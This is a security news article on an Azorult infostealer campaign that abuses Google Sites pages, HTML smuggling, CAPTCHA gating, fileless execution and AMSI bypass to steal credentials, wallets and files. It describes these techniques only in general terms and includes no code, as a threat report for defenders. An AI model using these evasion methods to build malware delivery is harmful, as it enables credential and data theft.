Sneaky Malware Campaign Abuses Google Sites to Deliver Data-Stealing Azorult

Azorult Malware
HTML smuggling code that collects Payload From Compromised Domain

Security researchers at Netskope Threat Labs have exposed a sophisticated malware campaign that leverages the trustworthiness of Google Sites to deliver a potent new version of the Azorult infostealer. This malware poses a significant cybersecurity risk due to its advanced capability to evade detection and steal a wide range of sensitive information.

What is Azorult?

Azorult Loader General Information using Detect It Easy

Azorult is a nasty program designed to steal your private information. It targets usernames, passwords, browsing history, and even cryptocurrency wallet data. Sadly, cases of Azorult theft are on the rise, especially within the healthcare industry.

Azorult has been identified as one of the top malware families preying on the healthcare sector over the past year. Its recent campaign, however, takes its nefarious activities to new heights, employing a multifaceted approach to deliver its payload while evading detection. The initial stage of the attack involves HTML smuggling, a technique that is becoming increasingly popular among cyber adversaries. This method cleverly bypasses web controls by constructing malicious payloads directly on the client’s side, using legitimate HTML5 features and Javascript. In a twist of ingenuity, this campaign doesn’t embed the payload in the Javascript itself but in a separate JSON file hosted externally, adding an extra layer of stealth.

The Attack Unfolds

Unlike typical malware attacks, this Azorult campaign doesn’t rely on phishing emails or malicious downloads. Instead, the attackers carefully craft fake Google Docs pages hosted on the legitimate Google Sites platform. These decoy pages lure unsuspecting victims into thinking they are accessing a genuine document. However, a deceptive download is triggered, beginning the chain of infection.

HTML smuggling code that collects Payload From Compromised Domain

The campaign’s insidiousness lies in its use of multiple techniques to fly under the radar of security software:

  • HTML Smuggling with a Twist: The attackers employ HTML smuggling to hide the malicious code. However, instead of embedding the code directly within the fake Google Doc, they store it separately on an external website. This clever maneuver helps to evade initial security checks.
  • CAPTCHA Gatekeeping: To thwart automated security scanners like VirusTotal, many of the attacker’s websites incorporate a CAPTCHA test. This extra step hinders analysis and keeps the malicious code hidden for longer.
  • Fileless Execution and AMSI Bypass: Once on a victim’s machine, the Azorult malware executes directly in memory (fileless execution), leaving minimal traces to alert traditional antivirus solutions. Additionally, the campaign uses AntiMalware Scan Interface (AMSI) bypass techniques, effectively disabling a key security layer within Windows Defender and other antivirus products.

The Damage Azorult Does

Once on your computer, Azorult gets to work:

  • Snapshots Your Screen: It takes a picture of what you’re doing, potentially exposing private data at a glance.
  • Steals Browser Info: Usernames, passwords, and credit card numbers saved in your browser – all snatched.
  • Targets Crypto Wallets: Azorult aggressively targets over 100 different types of cryptocurrency wallets.
  • Grabs Your Files It hunts for sensitive documents, adding to the potential damage.

The theft of this information can have devastating consequences, including identity theft, financial fraud, and corporate data breaches. The healthcare industry, in particular, has been heavily targeted by Azorult, highlighting the danger it poses to the safekeeping of sensitive medical records.